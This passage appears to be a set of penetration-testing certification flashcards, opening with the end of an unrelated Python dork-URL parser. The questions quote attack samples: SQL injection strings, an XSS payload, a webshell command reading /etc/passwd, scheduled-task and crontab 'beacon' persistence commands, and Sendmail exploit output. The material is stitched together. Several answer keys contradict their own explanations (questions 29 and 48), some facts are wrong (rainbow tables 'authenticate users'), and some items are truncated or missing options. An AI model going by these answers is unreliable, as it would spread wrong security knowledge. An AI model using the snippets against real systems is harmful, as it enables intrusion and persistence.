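    for flag in ("pws", "filter", "num", "start"):
        if flag in qs:
            result["flags"][flag] = qs[flag][0]
    return result


def describe(parsed):
    """Plain-English reading of the parsed search, one note per effect."""
    notes = []
    for op, values in parsed["operators"].items():
        for v in values:
            if op == "site":
                notes.append(f"only results hosted under {v}")
            elif op in ("filetype", "ext"):
                notes.append(f"only files of type {v}")
            elif op == "related":
                notes.append(f"sites related to {v}")
            else:
                notes.append(f"{op} must contain {v}")
    for op, values in parsed["excluded"].items():
        for v in values:
            notes.append(f"excluding {op} {v}")
    if parsed["flags"].get("pws") == "0":
        notes.append("personalisation off")
    if "filter" in parsed["flags"]:
        mode = parsed["flags"]["filter"]
        notes.append("all result filtering off" if mode == "0" else f"filter mode {mode}")
    for kw in parsed["keywords"]:
        if "@" in kw:
            notes.append(f"pages containing an address matching {kw}")
        else:
            notes.append(f"keyword {kw}")
    return notes


if __name__ == "__main__":
    for u in (
        "https://www.google.com/search?q=password+filetype%3Axls+site%3Adiontraining.com&pws=0&filter=p",
        "https://www.google.com/search?q=*%40diontraining.com",
    ):
        print(u)
        for note in describe(parse_dork_url(u)):
            print("  -", note)
```

Running it on the two URLs from the cards gives, for the first, the three true statements (only diontraining.com, only xls files, personalisation off) and, for the second, a single keyword `*@diontraining.com` with no `site:` restriction, which is why that search returns pages anywhere that mention such an address rather than pages hosted at the domain.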

29
Q

During the analysis of data as part of ongoing security monitoring activities, which of the following is NOT a good source of information to validate the results of an analyst’s vulnerability scans of the network’s domain controllers?

A.Log files
B.SIEM systems
C.Configuration management systems
D.DMARC and DKIM

A

B.SIEM systems

Explanation:
OBJ-2.1: Vulnerability scans should never take place in a vacuum. Analysts should correlate scan results with other information sources, including logs, SIEM systems, and configuration management systems. DMARC (domain-based message authentication, reporting, and conformance) and DKIM (domain keys identified mail) are configurations performed on a DNS server to verify whether a third party that sends email on behalf of the organization is authorized to do so. For example, if you are using a third-party mailing list provider, they need your organization to authorize them to send email on your behalf by setting up DMARC and DKIM in your DNS records. While this is an important security configuration, it would not be a good source of information to validate the results of an analyst’s vulnerability scans on a domain controller.

30
Q

An attacker is using a precomputed table of values to attempt to crack your Windows password. What type of password attack is this?

A.Rainbow Table
B.Dictionary
C.Hybrid
D.Brute-force

A

A.Rainbow Table

Explanation:
OBJ-2.4: A rainbow table is a tool for speeding up attacks against Windows passwords by precomputing possible hashes. A rainbow table is used to authenticate users by comparing the hash value of the entered password against the one stored in the rainbow table. Using a rainbow table makes password cracking a lot faster and easier for an attacker.

31
Q

Which of the following weaknesses exist in WPS enabled wireless networks?

A.Utilizes TKIP to secure the authentication handshake
B.Utilizes a 24-bit initialization vector
C.Brute force occurs within 11,000 combinations
D.Utilizes a 40-bit encryption key

A

C.Brute force occurs within 11,000 combinations

Explanation:
OBJ-3.3: The most prominent attack against WPS enabled wireless networks involves brute-forcing the 8-digit PIN that clients use to enroll their devices without knowing the pre-shared key. WPS checks each half of the PIN individually, reducing the number of possible combinations from a maximum of 100,000,000 to only 11,000. This only takes a few minutes to crack on most modern computers, as long as the WAP doesn’t have a lockout after a certain number of failures. The lockout mechanism may also be triggered based on the client’s MAC, so an attacker can often spoof the MAC address to bypass this defense.

32
Q

Several users have contacted the help desk to report that they received an email from a well-known bank stating that their accounts have been compromised and they need to “click here” to reset their banking password. Some of these users are not even customers of this particular bank, though. Which of the following social engineering principles is being utilized as a part of this phishing campaign?

A.Intimidation
B.Familiarity
C.Consensus
D.Urgency

A

B.Familiarity

Explanation:
OBJ-3.1: Familiarity is a social engineering technique that relies on assuming a widely known organization’s persona. For example, in the United States, nearly 25% of Americans have a Bank of America account. For this reason, phishing campaigns often include emails pretending to be from Bank of America since 1 in 4 people who receive the email in the United States are likely to have an account. This makes them familiar with the bank name and more likely to click on the email link. This email appears to be untargeted since it was sent to both customers and non-customers of this particular bank; it is best classified as phishing. Spear phishing requires the attack to be more targeted and less widespread.

33
Q

A hacker successfully modified the sale price of items purchased through your company’s web site. During the investigation that followed, the security analyst has verified the web server, and the Oracle database was not compromised directly. The analyst also found no attacks that could have caused this during their log verification of the Intrusion Detection System (IDS). What is the most likely method that the attacker used to change the items’ sale price?

A.SQL injection
B.Changing hidden form values
C.Buffer overflow attack
D.Cross-site scripting

A

B.Changing hidden form values

Explanation:
OBJ-3.4: Since there are no indications in the IDS logs, the database, or the server, it is most likely that the hacker changed hidden form values to change the items’ price in the shopping cart. A buffer overflow is an anomaly that occurs when a program overruns the buffer’s boundary and overwrites adjacent memory locations while writing data to a buffer. Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in a browser side script, to a different end-user. SQL injection is a code injection technique used to attack data-driven applications. Malicious SQL statements are inserted into an entry field for execution, such as dumping the database contents to the attacker.

34
Q

You are planning to exploit a network-based vulnerability against a Windows server. As part of your planning, you use the auxiliary scanner in Metasploit against the network and receive the following results:

-=-=-=-=-=-
[+] 192.168.1.2 community string: 'public' info: 'GSM7224 L2 Managed Gigabit Switch'
[+] 192.168.1.199 community string: 'public' info: 'HP ETHERNET MULTI-ENVIRONMENT'
[+] 192.168.1.2 community string: 'private' info: 'GSM7224 L2 Managed Gigabit Switch'
[+] 192.168.1.199 community string: 'private' info: 'HP ETHERNET MULTI-ENVIRONMENT'
[*] Validating scan results from 2 hosts...
[*] Host 192.168.1.199 provides READ-WRITE access with community 'internal'
[*] Host 192.168.1.199 provides READ-WRITE access with community 'private'
[*] Host 192.168.1.199 provides READ-WRITE access with community 'public'
[*] Host 192.168.1.2 provides READ-WRITE access with community 'private'
[*] Host 192.168.1.2 provides READ-ONLY access with community 'public'
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
-=-=-=-=-=-

Based on the output above, which of the following exploits are you preparing to use?

A.SNMP Exploit
B.FTP Exploit
C.SMB Exploit
D.SMTP Exploit

A

A.SNMP Exploit

Explanation:
OBJ-3.2: SNMP provides a lot of information about different target devices on the network. Based on the output shown, you should identify that this is an SNMP scan based on the “community string” keyword. From your Network+ and Security+ studies, you should remember that SNMP uses community strings as a basic authentication mechanism before allowing you to access a network device’s statistics. In this scan, two devices are found on this network with default public and private community strings. This makes these devices vulnerable to an SNMP attack for further exploitation.

35
Q

Which of the following is a characteristic of a Blind SQL Injection vulnerability?

A.Administrator of the vulnerable application cannot see the request to the webserver
B.Application properly filters the user input but it is still vulnerable to code injection in a blind attack
C.Administrator of the affected application does not see an error message during a successful attack
D.An attacker cannot see any of the display errors with information about the injection during a blind attack

A

D.An attacker cannot see any of the display errors with information about the injection during a blind attack

Explanation:
OBJ-3.4: Blind SQL injection is a type of SQL injection attack that asks the database true or false questions and determines the answer based on the application’s response. This attack is often used when the web application is configured to show generic error messages but has not mitigated the code that is vulnerable to SQL injection.

36
Q

Which of the following scan types are useful for probing firewall rules?

A.TCP SYN
B.TCP ACK
C.TCP RST
D.XMAS TREE

A

B.TCP ACK

Explanation:
OBJ-3.2: TCP ACK scans can be used to determine what services are allowed through a firewall. An ACK scan sends TCP packets with only the ACK bit set. Whether ports are open or closed, the target is required to respond with an RST packet. Firewalls that block the probe usually make no response or send back an ICMP destination unreachable error. This distinction allows Nmap to report whether the ACK packets are being filtered. A TCP SYN scan can sometimes be used to determine what ports are filtered. Still, if the firewall is configured to drop packets for disallowed ports instead of sending an RST packet, then a TCP SYN scan will not be able to determine if a firewall was there or if the port was simply unavailable. A target sends a TCP RST packet in response to a TCP ACK scan, but a TCP RST is not a valid type of scan itself. An XMAS Tree scan will set the FIN, PSH, and URG flags in the TCP packet. This is a noisy type of scan and not useful for probing firewall rules.

37
Q

Which of the following type of threats did the Stuxnet attack rely on to cross an airgap between a business and an industrial control system network?

A.Directory traversal
B.Cross-site scripting
C.Removable media
D.Session hijacking

A

C.Removable media

Explanation:
OBJ-3.1: Airgaps are designed to remove connections between two networks to create a physical segmentation between them. The only way to cross an airgap is to have a physical device between these systems, such as using a removable media device to transfer files between them. A directory traversal is an HTTP attack that allows attackers to access restricted directories and execute commands outside of the web server’s root directory. Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. A session hijacking attack compromises the session token by stealing or predicting a valid session token to gain unauthorized access to the Web Server. A directory traversal, cross-site scripting, or session hijacking attack cannot by itself cross an airgap.

38
Q

What type of wireless security measure can easily be defeated by a hacker by spoofing their network interface card’s hardware address?

A.MAC filtering
B.WEP
C.Disable SSID broadcast
D.WPS

A

A.MAC filtering

Explanation:
OBJ-3.2: Wireless access points can utilize MAC filtering to ensure only known network interface cards are allowed to connect to the network. If the hacker changes their MAC address to a trusted MAC address, they can easily bypass this security mechanism. MAC filtering is considered a good security practice as part of a larger defense-in-depth strategy, but it won’t stop a skilled hacker for long. MAC addresses are permanently burned into the network interface card by the manufacturer and serve as the device’s physical address. WEP is the Wired Equivalent Privacy encryption standard, which is considered obsolete in modern wireless networks. WEP can be broken using a brute force attack within just a few minutes by an attacker. Another security technique is to disable the SSID broadcast of an access point. While this prevents the SSID broadcast, a skilled attacker can still find the SSID using discovery scanning techniques. WPS is the WiFi Protected Setup. WPS is used to connect and configure wireless devices to an access point easily.

39
Q

During her login session, Sally is asked by the system for a code sent to her via text (SMS) message. Which of the following concerns should she raise to her organization’s AAA services manager?

A.SMS should be encrypted to be secure
B.SMS messages may be accessible to attackers via VoIP or other systems
C.SMS should be paired with a third factor
D.SMS is a costly method of providing a second factor of authentication

A

B.SMS messages may be accessible to attackers via VoIP or other systems

Explanation:
OBJ-3.4: NIST’s SP 800-63-3 recommends that SMS messages be deprecated as a means of delivering a second factor for multifactor authentication because they may be accessible to attackers. SMS is unable to be encrypted (at least without adding additional applications to phones). A third factor is typically not a user-friendly recommendation and would be better handled by replacing SMS with the proposed third factor. SMS is not a costly method since it can be deployed for less than $20/month at scale.

40
Q

Sarah is conducting a penetration test against Dion Training’s Windows-based network. This engagement aims to simulate an advanced persistent threat and demonstrate persistence for 30 days without their system administrators identifying the intrusion. Which of the following commands should Sarah use to run a script that beacons back to her computer every 20 minutes?

A.schtasks /create /tn beacon /tr C:\temp\beacon.bat /sc MINUTE /mo 20 /ru SYSTEM
B.(crontab -l; echo "*/20 * * * * /tmp/beacon") | crontab -
C.schtasks /create /tn beacon /tr /tmp/beacon /sc MINUTE /mo 20 /ru SYSTEM
D.(crontab -l; echo "* */20 * * * /tmp/beacon") | crontab -

A

A.schtasks /create /tn beacon /tr C:\temp\beacon.bat /sc MINUTE /mo 20 /ru SYSTEM

Explanation:
OBJ-3.7: A scheduled task or scheduled job is an instance of execution, like initiating a process or running a script, that the system performs on a set schedule. Once the task executes, it can prompt the user for interaction or run silently in the background; it all depends on what the task is set up to do. Scheduled tasks in Windows use the schtasks command. The correct answer for this persistence is to enter the command “schtasks /create /tn beacon /tr C:\temp\beacon.bat /sc MINUTE /mo 20 /ru SYSTEM”, which will create a task called “beacon” that runs the script at “C:\temp\beacon.bat” every 20 minutes as the SYSTEM level user. The other variant of schtasks is incorrect because it uses a Linux-based file directory structure to reference the script location and would fail to run in Windows. The crontab options are used in Linux, not in Windows.

41
Q

Which attack utilizes a wireless access point made to look as if it belongs to the network to eavesdrop on the wireless traffic?

A.Evil Twin
B.Rogue Access Point
C.WEP Attack
D.Wardriving

A

A.Evil Twin

Explanation:
OBJ-3.3: An evil twin is meant to mimic a legitimate hotspot provided by a nearby business, such as a coffee shop that provides free Wi-Fi access to its patrons. The evil twin is the wireless LAN equivalent of the phishing scam. This type of attack may be used to steal the passwords of unsuspecting users by monitoring their connections or phishing, which involves setting up a fraudulent web site and luring people there.

42
Q

You are conducting a penetration test against an organization. You created an evil twin of their wireless network. Many of the organization’s laptops are now connected to your evil twin access point. You want to capture all of the victim’s web browsing traffic in an unencrypted format during your attack. Which of the following exploits should you utilize to meet this goal?

A.Perform a deauthentication attack
B.Perform an SSL downgrade attack
C.Perform a man-in-the-middle attack
D.Perform an SSL stripping attack

A

D.Perform an SSL stripping attack

Explanation:
OBJ-3.3: An SSL stripping attack, also known as an HTTP downgrade attack, forces the client to communicate with the webserver in plain text (unencrypted) over HTTP instead of HTTPS. Both SSL downgrade and SSL stripping attacks are used to force the victim into using a weaker encryption mechanism (SSL downgrade to SSL-based HTTPS) or no encryption (SSL stripping to HTTP) for its web traffic.

43
Q

A penetration tester is conducting an assessment of a wireless network that is secured using WPA2 Enterprise encryption. Which of the following are major differences between conducting reconnaissance of a wireless network versus a wired network? (SELECT TWO)

A.Encryption
B.Network access Control
C.Port security
D.Authentication
E.Physical accessibility
F.MAC filtering

A

A.Encryption
E.Physical accessibility

Explanation:
OBJ-3.3: Most wireless networks utilize end-to-end encryption, whereas wired networks do not. Physical accessibility is another major difference between wireless and wired networks since wireless networks can be accessed from a distance using powerful antennas. Authentication, MAC filtering, and network access control (NAC) can be implemented equally on wired and wireless networks. Port security is only applicable to wired networks.

44
Q

Fail to Pass Systems recently installed a break and inspect appliance that allows their cybersecurity analysts to observe HTTPS traffic entering and leaving their network. Consider the following output from a recorded session captured by the appliance:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
POST /www/default.php HTTP/1.1
HOST: .123
Content-Length: 147
Cache-Control: no-cache
Origin: chrome-extension://ghwjhwrequsds
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryaym16ehT29q60rUx
Accept: */*
Accept-Language: zh, en-us; q=0.8, en; q=0.6
Cookie: security=low; PHPSESSID=jk3j2kdso8x73kdjhehakske

------WebKitFormBoundaryaym16ehT29q60rUx
Content-Disposition: form-data; name="q"

cat /etc/passwd

------WebKitFormBoundaryaym16ehT29q60rUx
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Which of the following statements is true?

A.The /etc/passwd file was just downloaded through a webshell by an attacker
B.This is a normal request from a host to your web server in the DMZ
C.A request to issue the command “cat /etc/passwd” occurred but additional analysis is required to verify if the file was downloaded
D.The web browser used in the attack was Microsoft Edge

A

C.A request to issue the command “cat /etc/passwd” occurred but additional analysis is required to verify if the file was downloaded

Explanation:
OBJ-3.2: This is a POST request to run the “cat /etc/passwd” command from an outside source. It is not known from the evidence provided whether this command was successful or not, but it should be analyzed further because this is not expected, normal traffic. While the browser’s default language was configured for Chinese (zh), this is easily changed and cannot be used to draw authoritative conclusions about the threat actor’s true location or persona. The User-Agent used is listed as Mozilla, which is used by both Firefox and Google Chrome. For an in-depth analysis of the full attack this code snippet was taken from, please visit https://www.rsa.com/content/dam/en/solution-brief/asoc-threat-solution-series-webshells.pdf. This 6-page article is definitely worth your time to look over and learn how a remote access web shell is used as an exploit.

45
Q

You are conducting a static analysis of an application’s source code and see the following:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
String query = "SELECT * FROM courses WHERE courseID='" + request.getParameter("id") + "' AND certification='" + request.getParameter("certification") + "'";
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

If an attacker wanted to get a complete copy of the courses table and was able to substitute arbitrary strings for “id” and “certification”, which of the following strings allow this to occur?

A.id = "1' OR '1'=='1" and certification = "cysa' OR '1'=='1"
B.id = "1' OR '1==1" and certification = "cysa' OR '1=='1"
C.id = "1' OR '1'=='1"
D.certification = "cysa' OR '1"=='1"

A

A.id = "1' OR '1'=='1" and certification = "cysa' OR '1'=='1"

Explanation:
OBJ-3.4: The id and certification values must be crafted so that, when substituted into the “getParameter” fields, the SQL statement formed is still complete and the ENTIRE WHERE clause evaluates to a Boolean true every time it is evaluated. The AND in the middle of the WHERE clause means that both the courseID portion and the certification portion must be true for the whole clause to be true in every case. When this occurs, the entire table of courses would be returned. The only string that would ensure both halves of the WHERE clause always return true would be

46
Q

While conducting a penetration test of an organization’s web applications, you attempt to insert the following script into the search form on the company’s web site:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
<script>alert("This site is vulnerable to an attack!")</script>
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Then, you click the search button, and a pop-up box appears on your screen showing the following text, “This site is vulnerable to an attack!” Based on this response, what vulnerability have you uncovered in the web application?

A.Buffer Overflow
B.Cross-site request forgery
C.Distributed denial of service
D.Cross-site scripting

A

D.Cross-site scripting

Explanation:
OBJ-3.4: This is a form of Cross-Site Scripting (XSS). Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users. Attackers may use a cross-site scripting vulnerability to bypass access controls such as the same-origin policy. Cross-site request forgery (CSRF or XSRF) is a malicious exploit of a website where unauthorized commands are transmitted from a user that the web application trusts. There are many ways in which a malicious website can transmit commands, such as specially-crafted image tags, hidden forms, and JavaScript XMLHttpRequests can all work without the user’s interaction or even knowledge. A distributed denial-of-service (DDoS) attack is a malicious attempt to disrupt normal traffic of a targeted server, service, or network by overwhelming the target or its surrounding infrastructure with a flood of Internet traffic. A buffer overflow is an anomaly that occurs when a program overruns the buffer’s boundary and overwrites adjacent memory locations while writing data to a buffer.

47
Q

Tony works for a company as a cybersecurity analyst. His company runs a website that allows public postings. Recently, users have started complaining about the website having pop-up messages asking for their username and password. Simultaneously, your security team has noticed a large increase in the number of compromised user accounts on the system.

What type of attack is most likely the cause of both of these events?

A.SQL Injection
B.Cross-site scripting
C.Cross-site request forgery
D.Rootkit

A

B.Cross-site scripting

Explanation:
OBJ-3.4: This scenario is a perfect example of the effects of a cross-site scripting (XSS) attack. If your website’s HTML code does not perform input validation to remove scripts that may be entered by a user, then an attacker can create a popup window that collects passwords and uses that information to compromise other accounts further. A cross-site request forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they are currently authenticated. An XSS will allow an attacker to execute arbitrary JavaScript within the victim’s browser (such as creating pop-ups). A CSRF would allow an attacker to induce a victim to perform actions they do not intend to perform. A rootkit is a set of software tools that enable an unauthorized user to control a computer system without being detected. SQL injection is the placement of malicious code in SQL statements via web page input. None of the things described in this scenario would indicate a CSRF, rootkit, or SQL injection.

48
Q

Christina is conducting a penetration test against Dion Training’s network. The goal of this engagement is to conduct data exfiltration of the company’s exam database without detection. Christina enters the following command into the terminal:

-=-=-=-=-=-=-
C:\database\exams.db>c:\Users\Christina\Desktop\beachpic.png:exams.db
-=-=-=-=-=-=-

Next, Christina emailed the beachpic.png file to her personal email account. Which of the following techniques did she use to exfiltrate the file?

A.NTFS Encryption
B.Alternate data streams
C.Unquoted service path
D.DLL Hijacking

A

C.Unquoted service path

Explanation:
OBJ-3.7: An alternate data stream (ADS) is a feature of Microsoft’s NT File System (NTFS) that enables multiple data streams for a single file name by forking one or more files to another. ADS can be abused by hiding one file into another, as shown in this scenario. Once received in her email, she could access the database by opening the file as “beachpic.png:exams.db”.

49
Q

You are attempting to exploit a network-based vulnerability against a RedHat Linux server. You execute the following commands and receive the results below:

-=-=-=-=-=-
[pentest@DionTraining]# ./bysin support DionTraining RedHat
Sendmail <8.12.8 crackaddr() exploit by bysin
     from the l33tsecurity crew
Resolving address... Address found
Connecting... Connected!
Sending exploit... Exploit sent!
Waiting for root prompt… 
[pentest@DionTraining]# telnet localhost 2525
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
whoami
root
-=-=-=-=-=- 

Based on the output above, which of the following exploits are you preparing to use?

A.SNMP Exploit
B.FTP Exploit
C.SMB Exploit
D.SMTP Exploit

A

D.SMTP Exploit

Explanation:
OBJ-3.2: If you see a question like this, don’t let it confuse you. Look for keywords and phrases that you recognize to answer the question. As you look at the command issued in the first line, you may not recognize it. That is because this is an older exploit script that is being run with the parameters of support (the user account we are trying to exploit), DionTraining (our penetration testing machine’s name), and RedHat (our target/victim server). Ignoring this line, look at the second line where you see a keyword that you should recognize: Sendmail. Sendmail is a service that runs on Linux machines to “send mail” using the SMTP protocol over port 25. This is the key to answering this question. As you continue through the script, you see it performed a DNS name resolution from RedHat to the server’s IP, connected to the server, and successfully sent the exploit. This exploit conducts a buffer overflow against a vulnerable Sendmail server, resulting in the server providing a remote callback to a listening port on the attacker’s machine (port 2525). This is why the attacker then telnets into their localhost over port 2525 and runs the whoami command to determine which user they are connected to the victimized server as. In this case, they are reported as the root user, which means this SMTP exploit was successful.

50
Q

During a penetration test, which of the following should you perform if your goal is to conduct a successful vishing attack?

A.Send a text message with a malicious link to the organization’s executives
B.Send targeted emails with a malicious link attachment to the organization’s CEO
D.Call the CTO’s assistant using a pretext to gather information about their schedule

A

D.Call the CTO’s assistant using a pretext to gather information about their schedule

Explanation:
OBJ-3.1: Vishing (voice phishing) is a phishing attack in which an attacker entices their victim through a traditional telephone system or IP-based voice communications like Voice over IP (VoIP). If the attack is being carried out using the attacker’s voice over a telephone, it is usually considered vishing.

51
Q

A cybersecurity analyst is reviewing the logs of a Citrix NetScaler Gateway running on a FreeBSD 8.4 server and saw the following output:

-=-=-=-=--=-=-=-=--=-=-=-=--=-=-=-=--=-=-=-=--=-=-=-=--=-=-=-=-
10.1.1.1 - - [10/Jan/2020:13:23:51 +0000] "POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1" 200 143 "https://10.1.1.2/" "USERAGENT"

10.1.1.1 - - [10/Jan/2020:13:23:53 +0000] "GET /vpn/../vpns/portal/backdoor.xml HTTP/1.1" 200 941 "-" "USERAGENT"

1.1.1.1 - - [10/Jan/2020:16:12:31 +0000] "POST /vpns/portal/scripts/newbm.pl HTTP/1.1" 200 143 "https://10.1.1.2/" "USERAGENT"
-=-=-=-=--=-=-=-=--=-=-=-=--=-=-=-=--=-=-=-=--=-=-=-=--=-=-=-=-

What type of attack was most likely being attempted by the attacker?

A.SQL injection
B.Directory traversal
C.XML Injection
D.Password spraying

A

B.Directory traversal

Explanation:
OBJ-3.4: A directory traversal attack aims to access files and directories stored outside the webroot folder. By manipulating variables or URLs that reference files with “dot-dot-slash (../)” sequences and their variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on the file system, including application source code or configuration and critical system files. The example output provided comes from a remote code execution vulnerability being exploited in which a directory traversal is used to access the files. XML Injection is an attack technique used to manipulate or compromise an XML application or service’s logic. SQL injection is the placement of malicious code in SQL statements via web page input. Password spraying attempts to crack various users’ passwords by attempting a compromised password against multiple user accounts.

52
Q

You are conducting a social engineering attack against an organization as part of an engagement. You walk into the break room and see a couple of system administrators talking about the previous weekend’s football game. You listen for a moment as the two argue over whose team was better. You notice that one of the guys is about your age and talks really fast. You walk over and immediately start talking fast, backing up this guy’s claims about his team, and joking around with him. After they are done talking about football, you comment about how Linux servers are so much better than Windows to see his response as you try to figure out the server types used at this organization. What type of social engineering principle is being exploited here?

A.Authority
B.Scarcity
C.Intimidation
D.Likeness

A

D.Likeness

Explanation:
OBJ-3.1: Likeness is the social engineering motivational technique that relies on people being more willing to help people who look and sound like themselves. In this scenario, the social engineer started talking sports and acting like the victim he sought to exploit. He then started making jokes about different server types to see if he could gain some information from the victim.

53
Q

A cybersecurity analyst notices that an attacker is trying to crack the WPS pin associated with a wireless printer. The device logs show that the attacker tried 00000000, 00000001, 00000002 and continued to increment by 1 number each time until they found the correct PIN of 13252342. Which of the following type of password cracking was being performed by the attacker?

A.Rainbow table
B.Dictionary
C.Hybrid
D.Brute-force

A

D.Brute-force

Explanation:
OBJ-3.4: A brute-force attack is when an attacker uses a set of predefined values to attack a target and analyzes the response until he succeeds. Success depends on the set of predefined values. It will take more time if the set is larger, but there is a better probability of success. In a traditional brute-force attack, the passcode or password is incrementally increased by one letter/number each time until the right passcode/password is found.

54
Q

You are conducting a wireless penetration test against an organization. You have been monitoring the WPA2 encrypted network for almost an hour but have been unable to successfully capture a handshake. Which of the following exploits should you use to increase your chances of capturing a handshake?

A.Fragmentation Attack
B.Deauthentication Attack
C.Karma Attack
D.Downgrade attack

A

B.Deauthentication Attack

Explanation:
OBJ-3.3: Deauthentication attacks are used in the service of an evil twin, replay, cracking, denial of service, and other attacks. All 802.11 Wi-Fi protocols include a management frame that a client can use to announce that it wishes to terminate a connection with an access point. The victim’s device will be kicked off the access point by spoofing the victim’s MAC address and sending the deauthentication frame to the access point. If the user is still using the network, the wireless adapter will automatically reconnect by sending a handshake to the access point. This allows the attacker to capture the handshake during the reconnection.

55
Q

You are conducting a social engineering attack against an organization as part of an engagement. You spoof your caller ID to appear to be from within the company, then you call up the company and ask to speak with the CIO’s assistant. When they answer the phone, you tell them that you are from the IT department and that you detected a malicious intruder has taken over their account and is encrypting data all over the network. You offer to help them stop the attack quickly, but they first need to give you their password. The victim says they won’t give that information to you over the phone, to which you respond, “Ok, fine, but when the boss finds out that you could have stopped this attack and chose to ignore me, don’t say I didn’t warn you.” What type of social engineering principle is being exploited here?

A.Authority
B.Scarcity
C.Fear
D.Trust

A

C.Fear

Explanation:
OBJ-3.1: Fear is a visceral emotion that can motivate people to act in ways they normally would not. In this scenario, the social engineer tries to convince the victim that their actions must be taken immediately, or bad consequences might occur. This is an attempt to cause fear and anxiety in the victim to hand over their password.

56
Q

How is it possible to determine if an executable file is a shell script read by Bash?

A.The file must end with .sh
B.The first line starts with !#/bin/bash
C./bin/bash has to be run in debug mode
D.Only if you are logged in as root

A

B.The first line starts with !#/bin/bash

Explanation:
OBJ-4.4: The first line of the script should start with #!/bin/bash. Most shell scripts will end with a .sh by convention, but it is not required. Remember, in Linux, file extensions are only useful to the end-user, but the operating system completely ignores them.

57
Q

Which of the following tools provides a penetration tester with PowerShell scripts that can maintain persistence and cover their tracks?

A.Powersploit
B.Responder
C.Empire
D.Searchsploit

A

A.Powersploit

Explanation:
OBJ-4.2: Powersploit is a series of Microsoft PowerShell scripts that pen testers can use in post-exploit scenarios. Empire (PowerShell Empire) is a post-exploitation framework for Windows devices that allows the attacker to run PowerShell agents without needing powershell.exe. It is commonly used to escalate privileges, launch other modules to capture data, extract passwords, and install persistent backdoors. Searchsploit is a tool included in the exploitdb package on Kali Linux that enables you to search the Exploit Database archive. Responder is a fake server and relay tool that is included with Kali Linux. It responds to LLMNR, NBT-NS, POP, IMAP, SMTP, and SQL queries to possibly recover sensitive information such as user names and passwords.

58
Q

What popular open-source port scanning tool is commonly used for host discovery and service identification?

A.Nmap
B.dd
C.Services.msc
D.Nessus

A

A.Nmap

Explanation:
OBJ-4.2: The world’s most popular open-source port scanning utility is nmap. The Services console (services.msc) allows an analyst to disable or enable Windows services. The dd tool is used to copy files, disk, and partitions, and it can also be used to create forensic disk images. Nessus is a proprietary vulnerability scanner developed by Tenable. While Nessus does contain the ability to conduct a port scan, its primary role is as a vulnerability scanner, and it is not an open-source tool.

59
Q

A software assurance laboratory performs a dynamic assessment on an application by automatically generating random data sets and inputting them to cause an error or failure condition. Which of the following is the laboratory performing?

A.Fuzzing
B.Stress Testing
C.User Acceptance Testing
D.Security Regression Testing

A

A.Fuzzing

Explanation:
OBJ-4.2: Fuzzing or fuzz testing is an automated software testing technique that involves providing invalid, unexpected, or random data as inputs to a computer program. The program is then monitored for exceptions such as crashes, failing built-in code assertions, or potential memory leaks. User Acceptance Testing is the process of verifying that a created solution/software works for the user. Security regression testing ensures that changes made to a system do not weaken its security; it is therefore of high significance, and interest in such approaches has steadily increased. Stress testing verifies the system’s stability and reliability by measuring its robustness and error handling capabilities under heavy load conditions.

60
Q

Which of the following tools is a post-exploitation framework that would allow a penetration tester to run PowerShell agents without requiring the use of powershell.exe?

A.Powersploit
B.Responder
C.Empire
D.Searchsploit

A

C.Empire

Explanation:
OBJ-4.2: Empire (PowerShell Empire) is a post-exploitation framework for Windows devices that allows the attacker to run PowerShell agents without needing powershell.exe. It is commonly used to escalate privileges, launch other modules to capture data, extract passwords, and install persistent backdoors. Powersploit is a series of Microsoft PowerShell scripts that pen testers can use in post-exploit scenarios. Searchsploit is a tool included in the exploitdb package on Kali Linux that enables you to search the Exploit Database archive. Responder is a fake server and relay tool that is included with Kali Linux. It responds to LLMNR, NBT-NS, POP, IMAP, SMTP, and SQL queries to possibly recover sensitive information such as user names and passwords.

61
Q

Which of the following tools is considered a web application scanner?

A.Nessus
B.Qualys
C.OpenVAS
D.ZAP

A

D.ZAP

Explanation:
OBJ-4.2: OWASP Zed Attack Proxy (ZAP) is the world’s most widely used web application scanner. It is free, open-source, and provided by the Open Web Application Security Project (OWASP). Nessus, Qualys, and OpenVAS are all classified as infrastructure vulnerability scanners.

62
Q

If you cannot ping a target because you are receiving no response or a response that states the destination is unreachable, then ICMP may be disabled on the remote end. If you wanted to elicit a response from a host using TCP, what tool would you use?

A.Hping
B.Traceroute
C.Ptunnel
D.Broadcast ping

A

A.Hping

Explanation:
OBJ-4.2: Hping is a handy little utility that assembles and sends custom ICMP, UDP, or TCP packets and then displays any replies. It was inspired by the ping command but offers far more control over the probes sent. It also has a handy traceroute mode and supports IP fragmentation. Hping is particularly useful when trying to traceroute/ping/probe hosts behind a firewall that blocks attempts using the standard utilities. Hping also allows you to map out firewall rule sets. It is also great for learning more about TCP/IP and experimenting with IP protocols. Hping does not support IPv6, though, so the Nmap creators have created Nping to fill this gap and serve as an updated variant of Hping. Traceroute and tracert are computer network diagnostic commands for displaying the route and measuring packets’ transit delays across an Internet Protocol network. Traceroute uses ICMP and not TCP. Broadcast ping is simply pinging the subnet’s broadcast IP using the ping command, but if a regular ping does not work, neither will a broadcast ping. Ptunnel is an application that allows you to reliably tunnel TCP connections to a remote host using ICMP echo request and reply packets, commonly known as ping requests and replies. Ptunnel is used as a covert channel, not to elicit a response from a host using TCP.

63
Q

A cybersecurity analyst is reviewing the logs of an authentication server and saw the following output:

-=-=-=-=–=-=-=-=–=-=-=-=–=-=-=-=–=-=-=-=–=-=-=-=–=-=-=-=-
